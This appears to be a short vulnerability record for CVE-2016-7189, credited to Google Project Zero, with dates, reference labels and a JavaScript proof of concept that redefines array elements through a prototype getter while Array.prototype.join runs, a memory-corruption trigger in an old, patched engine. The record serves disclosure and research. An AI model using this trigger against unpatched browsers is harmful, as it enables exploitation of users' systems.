CVE-2016-7189.md

CVE-2016-7189

• Report: Aug 2016
• Fix: Oct 2016
• Credit: Natalie Silvanovich, Google Project Zero

PoC

var t = new Array(1,2,3);
t.length = 100;
var o = {};
  Object.defineProperty(o, '3', {
    get: function() {

      t[0] = {};
      for(var i = 0; i < 100; i++){
          t[i] = {a : i};
      }
      return 7;
    }
  });

t.__proto__ = o;

var j = [];
var s = j.join.call(t);

Reference

• Microsoft
• Project Zero
• Fix